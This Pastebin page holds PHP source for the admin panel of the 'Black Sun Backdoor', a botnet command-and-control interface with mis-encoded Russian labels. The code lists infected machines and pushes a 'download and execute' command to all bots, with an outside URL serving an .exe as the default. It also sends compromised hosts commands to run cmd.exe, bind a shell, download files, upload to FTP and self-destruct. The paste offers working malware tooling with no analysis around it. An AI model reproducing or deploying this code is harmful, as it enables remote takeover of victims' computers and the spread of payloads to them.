API tools faq
paste
Advertisement
FlyFar

web/admin.php

FlyFar
May 27th, 2024
889
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 12.74 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. <?
  2. /*
  3.  *  ---------------------------------------------------------------------
  4.  *         ____  _            _     _____            
  5.  *        |  _ \| |          | |   / ____|            
  6.  *        | |_) | | __ _  ___| | _| (___  _   _ _ __  
  7.  *        |  _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
  8.  *        | |_) | | (_| | (__|   < ____) | |_| | | | |
  9.  *        |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
  10.  *                 Black Sun Backdoor v1.0 prebeta        
  11.  *
  12.  *                          (x) Cytech 2007
  13.  *  ---------------------------------------------------------------------
  14.  */
  15. ?>
  16. <title> BlackSun Remote Control System </title>
  17.  
  18. <center><img src="images/logo.JPG"><br><br></center>
  19. <center>
  20. <table style="text-align: center; width: 959px; height: 32px; "border="0" cellpadding="0" cellspacing="0">
  21.   <tbody>
  22.     <tr>
  23.     <small>
  24.            <td><a href = "?act=connect"><img src="images/connect.jpg"><br>ïîäêëþ÷åíèå</a></td>
  25.            <td><a href = "?act=stat"><img src="images/statistic.jpg"><br>ñòàòèñòèêà</a></td>
  26.     </small>
  27.     </tr>
  28.   </tbody>
  29. </table>
  30. </center>
  31. <style>
  32. BODY {
  33.     color: #DDDDDD;
  34.     background-color: #000000;
  35.     scrollbar-face-color: #212121;
  36.     scrollbar-highlight-color: #404040;
  37.     scrollbar-shadow-color: #000000;
  38.     scrollbar-3dlight-color: #616161;
  39.     scrollbar-arrow-color:  #66E201;
  40.     scrollbar-track-color: #000000;
  41.     scrollbar-darkshadow-color: #000000;
  42. }
  43.  
  44. .a {
  45.     font-family: Verdana;
  46.     font-size: 12px;}
  47.  
  48. A {
  49.     color: #00AA00;
  50.     text-decoration: none;
  51. }
  52.  
  53. A:hover {
  54.     color: #FFFFFF;
  55.     text-decoration: none;
  56. }
  57.  
  58. TD {
  59.     font-family: Verdana;
  60.     font-size: 12px;
  61.     color: #DDDDDD;
  62. }
  63.  
  64. input  
  65. {
  66.     font-size: 10pt;font-family: Arial;
  67.     color: #999930;
  68.     background-color: #000000;
  69.     border-color:#666666 #666666 #666666 #666666;
  70.     border-width:1pt 1pt 1pt 1pt;
  71.     border-style:dotted dotted dotted dotted;
  72.     padding-left: 2pt;
  73.     overflow:hidden;
  74. }
  75. select  
  76. {
  77.     font-size: 10pt;font-family: Arial;
  78.     color: #999930;
  79.     background-color: #000000;
  80.     border-color:#666666 #666666 #666666 #666666;
  81.     border-width:1pt 1pt 1pt 1pt;
  82.     border-style:dotted dotted dotted dotted;
  83.     padding-left: 2pt;
  84.     overflow:hidden;
  85. }
  86. </style>
  87. <font style="font-family: Verdana;"><small>
  88.  
  89. <?
  90.     /**********************************************************/
  91.     Error_Reporting(E_ALL & ~E_NOTICE);
  92.     /**********************************************************/
  93.      include("conf.php");  
  94.     /**********************************************************/
  95.    
  96.     function SendCommand($host, $port, $givemecmd)
  97.     {          
  98.             $sock = fsockopen($host,$port,$errno,$errstr);
  99.             if (!$sock)                                  
  100.             {
  101.                 echo "cant connect to remote server!";
  102.             }
  103.             else
  104.             {
  105.                 fputs ($sock,$givemecmd);
  106.                 while (!feof($sock))
  107.                 {
  108.                   $ans = fgets($sock,999666);  
  109.                   echo(htmlspecialchars($ans));
  110.                 }
  111.             }
  112.             fclose ($sock);
  113.     }
  114.    
  115.     /**********************************************************/
  116.    
  117.     function ConnectMySQL($host, $login, $password, $database)
  118.     {
  119.             $connect=mysql_connect($host,$login,$password);
  120.            
  121.             if ($connect===FALSE)
  122.             {
  123.                 die('cant connect to database');
  124.             }
  125.            
  126.             $selectdb=mysql_select_db($database);
  127.            
  128.             if ($selectdb==FALSE)
  129.             {
  130.                 die('cant select database');
  131.             }
  132.     }
  133.    
  134.     /**********************************************************/
  135.    
  136.     function ShowBotnetTable($db_botable)
  137.     {
  138.         echo '<br><br><b>[ Ñòàòèñòèêà: ]</b><br><br>';
  139.         echo '<center>';
  140.         echo '<table style="text-align: left; width: 912px; height: 80px;" border="1" cellpadding="0"';
  141.         echo 'cellspacing="0"><tbody><tr>';
  142.         echo '<td><center>Èìÿ êîìïüþòåðà</center></td>';
  143.         echo '<td><center>Òåêóùàÿ HTTP-êîìàíäà</center></td>';
  144.         echo '<td><center>IP-àäðåñ</center></td>';
  145.         echo '<td><center>Backdoor-ïîðò</center></td>';
  146.         echo '<td><center>Ïîñëåäíåå ïîäêëþ÷åíèå</center></td>';
  147.         echo '<td><center>Äåéñòâèå</center></td>';
  148.         echo '</tr>';
  149.  
  150.         $res = mysql_query("SELECT * FROM $db_botable");
  151.         for ($i=0, $ROWS=mysql_num_rows($res); $i<$ROWS; $i++)
  152.         {
  153.              $row = mysql_fetch_assoc($res);
  154.              
  155.              echo '<tr>';
  156.                  foreach ($row as $key => $value)
  157.                  {
  158.                     if($key=="id") continue;
  159.                         #echo "<td>$value</td>";
  160.                         # äîáàâèòü ôèëüòðàöèþ!!!
  161.                         if($key=="uid")  
  162.                         {
  163.                             $uid = $value;
  164.                             echo "<td>$value</td>";
  165.                         }  
  166.                         if($key=="cmd")
  167.                         {
  168.                             $cmd=str_replace(""," ", $value); echo "<td>$cmd</td>";
  169.                         }
  170.                         if($key=="data")
  171.                         {
  172.                             $ip = $value;
  173.                             echo "<td>$ip</td>";
  174.                         }
  175.                         if($key=="port")
  176.                         {
  177.                             $port = $value;
  178.                             echo "<td>$port</td>";
  179.                         }
  180.                         if($key=="lconnection")
  181.                         {
  182.                             $lcon = $value;
  183.                             echo "<td>$lcon</td>";
  184.                         }
  185.                  }
  186.                         echo '<td><center><a href = "'; echo "?act=connect&ip=$ip&port=$port";
  187.                         echo '">ïîäêëþ÷èòüñÿ</a>';
  188.                        
  189.                         echo '<br><a href = "'; echo "?act=stat&bot=delete&uid=$uid";
  190.                         echo '">óäàëèòü</a></center></td>';
  191.              echo '</tr>';
  192.         }
  193.    
  194.         echo '</tbody></table></center>';
  195.     }
  196.  
  197.     /**********************************************************/
  198.  
  199.     function SetNewCommandForBots($db_botable)
  200.     {
  201.         echo '<br><br><b>[ Óñòàíîâèòü êîìàíäó áîòàì: ]</b><br><br>';
  202.         echo '<form action="" method="post">';
  203.         echo 'Ââåäèòå èìÿ áîòà (ñèìâîë "*" - âñåì áîòàì ñðàçó)<br>';
  204.         echo '<input name="botuid" size="10" value="*"><br>';
  205.     #   echo '<input name="newcmd" size="40" value="dexec_http://localhost/1.exe"><br>';
  206.     #   echo '<input name="set" value="óñòàíîâèòü" type="submit"><br><br>';
  207.  
  208.         echo 'Âûáåðèòå êîìàíäó äëÿ óñòàíîâêè<br>';
  209.         echo '<SELECT name=newcmd>';
  210.         echo '<OPTION value=dexec>Ñêà÷àòü è çàïóñòèòü ôàéë</OPTION>';
  211.         echo '<OPTION value=nocommand>Óáðàòü êîìàíäó</OPTION>';
  212.         echo '</SELECT><br>';
  213.        
  214.         echo 'Àðãóìåíò: <input name="arg1" size="50" value="http://nnp.0x48k.cc/load/bsun.exe"><br>';
  215.        
  216.         echo '<input name="set" value="óñòàíîâèòü" type="submit"><br><br>';
  217.         echo '</form>';
  218.        
  219.         $newcmd = htmlspecialchars(addslashes($_POST['newcmd']."".$_POST['arg1']));
  220.         $botuid = htmlspecialchars(addslashes($_POST['botuid']));
  221.        
  222.         if(!is_null($_POST['set'] && $_POST['botuid']))
  223.         {
  224.             if($botuid=="*")
  225.             {
  226.                 mysql_query("UPDATE $db_botable SET cmd='$newcmd'"); // óñòàíàâëèâàåì
  227.             }
  228.             else
  229.             {
  230.                 mysql_query("UPDATE $db_botable SET cmd='$newcmd' WHERE uid='$botuid'");
  231.             }
  232.         }
  233.     }
  234.     /**********************************************************/
  235.    
  236.     ConnectMySQL($db_host, $db_login, $db_password, $db_database);
  237.    
  238.     /**********************************************************/
  239.         # http://gate/admin.php?act=stat
  240.     if($_GET['act'] == "stat")
  241.     {
  242.  
  243.         ShowBotnetTable($db_botable);
  244.         SetNewCommandForBots($db_botable);
  245.  
  246.         # http://gate/admin.php?act=stat&bot=DELETE
  247.         if($_GET['bot'] == "delete")
  248.         {
  249.             $duid = htmlspecialchars(addslashes($_GET['uid']));
  250.        
  251.             echo "<b>âû äåéñòâèòåëüíî õîòèòå óäàëèòü $duid ?</b>";
  252.             echo '<form action="" method="post">';
  253.             echo '<input name="submit" value="äà" type="submit"><br><br>';
  254.             echo '</form><br><br>';
  255.            
  256.             if(!is_null($_POST['submit']))
  257.             {
  258.                 mysql_query("DELETE FROM $db_botable WHERE uid = '$duid'");
  259.                  echo "<br><a href = ?act=stat>íàæìèòå ñþäà, åñëè âàø áðàóçåð íå ïîääåðæèâàåò àâòîìàòè÷åñêîãî ðåäèðåêòà</a><br>";
  260.                 echo '<script>location="?act=stat";</script>';
  261.             }
  262.         }
  263.     }
  264.     /**********************************************************/
  265.         # http://gate/admin.php?act=connect
  266.     if($_GET['act'] == "connect")
  267.     {
  268.         if(is_null($_GET['connect']))
  269.         {
  270.                     $ip = htmlspecialchars(addslashes($_GET['ip']));
  271.                     $port = htmlspecialchars(addslashes($_GET['port']));
  272.  
  273.             echo '<center><br><br><b>[ Ïàðàìåòðû ïîäêëþ÷åíèÿ: ]</b><br>';
  274.             echo '<form action="" method="post">';
  275.             echo 'Õîñò: <input name="host" size="20" value="';
  276.                 if ($ip){ echo $ip; } else {echo '127.0.0.1';};
  277.             echo '"><br><br>';
  278.             echo 'Ïîðò: <input name="port" size="20" value="';
  279.                 if ($port){ echo $port; } else {echo '2121';};
  280.             echo '"><br><br>';
  281.             echo 'Ëîãèí: <input name="login" size="21" value="cytech"><br><br>';
  282.             echo 'Ïàðîëü: <input name="password" size="20" value="cytech"><br><br>';
  283.             echo '<input name="connect" value="Connect" type="submit"><br><br>';
  284.             echo '</form>';
  285.  
  286.                 if(!is_null($_POST['connect']))
  287.                 {
  288.                         $link = "?act=connect&connect=1&ip=".
  289.                                 htmlspecialchars(addslashes($_POST[host])).
  290.                                 "&port=".
  291.                                 htmlspecialchars(addslashes($_POST[port])).
  292.                                 "&login=".
  293.                                 htmlspecialchars(addslashes($_POST[login])).
  294.                                 "&password=".
  295.                                 htmlspecialchars(addslashes($_POST[password]));
  296.  
  297.                        
  298.                         echo "<br><a href = $link >íàæìèòå ñþäà, åñëè âàø áðàóçåð íå ïîääåðæèâàåò àâòîìàòè÷åñêîãî ðåäèðåêòà</a><br>";
  299.                         echo '<script>location="'.$link.'";</script>';
  300.                 }
  301.                 else
  302.                 {
  303.                         echo "<br>çàïîëíèòå âñå ïîëÿ ôîðìû<br>";
  304.                 }
  305.         }
  306.         # http://gate/admin.php?act=connect&connect=1
  307.         if($_GET['connect'] == "1")
  308.         {
  309.             echo '<form action="" method="post">';
  310.             echo '<br><br><b>[ Âûáåðèòå êîìàíäó äëÿ âûïîëíåíèÿ: ]</b>';
  311.             echo '<br><SELECT name=cmd>';
  312.             echo '<OPTION value=cmd>Âûïîëíåíèå êîìàíäû ÷åðåç cmd.exe [1]</OPTION>';
  313.             echo '<OPTION value=exec>Ñêðûòûé/âèäèìûé çàïóñê ïðèëîæåíèÿ ÷åðåç WinExec [2]</OPTION>';
  314.             echo '<OPTION value=bindshell>Çàáèíäèòü øåëë íà çàäàííîì ïîðòó [1]</OPTION>';
  315.             echo '<OPTION value=download>Ñêà÷àòü ôàéë ïî HTTP [2]</OPTION>';
  316.             echo '<OPTION value=ftp_upload>Çàêà÷àòü ôàéëà íà FTP [6]</OPTION>';
  317.             echo '<OPTION value=->----------------------------------------------</OPTION>';
  318.             echo '<OPTION value=msgbox>Âûâåñòè MessageBox [2]</OPTION>';
  319.             echo '<OPTION value=power>Ïèòàíèå (âûêëþ÷èòü/ïåðåçàãðóçèòü/ñïàòü/âñòàòü) [1]</OPTION>';
  320.             echo ' <OPTION value=monitor>Âêëþ÷èòü/âûêëþ÷èòü ìîíèòîð [1]</OPTION>';
  321.             echo '<OPTION value=cdrom>Îòêðûòü/çàêðûòü CD-ROM [1]</OPTION>';
  322.             echo '<OPTION value=keyboard>Ïåðåêëþ÷àòåëü ðåæèìîâ êëàâèàòóðû [1]</OPTION>';
  323.             echo '<OPTION value=mouse>Ïîìåíÿòü ìûøü íà ëåâøó/ïðàâøó [1]</OPTION>';
  324.             echo '<OPTION value=crazymouse>Ýôôåêò áåøåíîé ìûøè [2]</OPTION>';
  325.             echo '<OPTION value=funwindows>Ñïðÿòàòü/ïîêàçàòü îêíà [1]</OPTION>';
  326.             echo '<OPTION value=->----------------------------------------------</OPTION>';
  327.             echo '<OPTION value=version>Ïîëó÷èòü óñòàíîâëåííóþ âåðñèþ BlackSun [0]</OPTION>';
  328.             echo '<OPTION value=exitprocess>Çàêîí÷èòü ðàáîòó [0] </OPTION>';
  329.             echo ' <OPTION value=killmyself>Ñàìîóíè÷òîæèòüñÿ (íåîáõîäèì ëîãèí è ïàðîëü)</OPTION>';
  330.             echo '</SELECT>';
  331.             echo ' <br><br><br>';
  332.             echo ' Àðãóìåíò ¹1: <input name="arg1" size="50" value="netstat -an"><br>';
  333.             echo ' Àðãóìåíò ¹2: <input name="arg2" size="50" value="_"><br>';
  334.             echo ' Àðãóìåíò ¹3: <input name="arg3" size="50" value="_"><br>';
  335.             echo ' Àðãóìåíò ¹4: <input name="arg4" size="50" value="_"><br>';
  336.             echo ' Àðãóìåíò ¹5: <input name="arg5" size="50" value="_"><br>';
  337.             echo ' Àðãóìåíò ¹6: <input name="arg6" size="50" value="_"><br>';
  338.             echo ' <INPUT type="submit" name="submit" value="send command">';
  339.    
  340.            
  341.                     $login      =   $_GET['login'];
  342.                     $password   =   $_GET['password'];
  343.    
  344.                      $cmd  = $login.":".$password
  345.                             ."".$_POST['cmd']."".$_POST['arg1']."".$_POST['arg2']."".$_POST['arg3']
  346.                             ."".$_POST['arg4']."".$_POST['arg5']."".$_POST['arg6']."".$_POST['arg7'];
  347.                    
  348.                     echo '<br><br><b>[ Ðåçóëüòàò âûïîëíåíèÿ êîìàíäû: ]</b>';
  349.                     if(!is_null($_POST['submit']))
  350.                     {
  351.                         echo "</font><pre>";
  352.                         SendCommand($_GET['ip'], $_GET['port'], $cmd);
  353.                         echo "</pre>";
  354.                     }
  355.             }
  356.                
  357.     }
  358.     /**********************************************************/
  359.  ?>
Tags: malware Backdoor
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!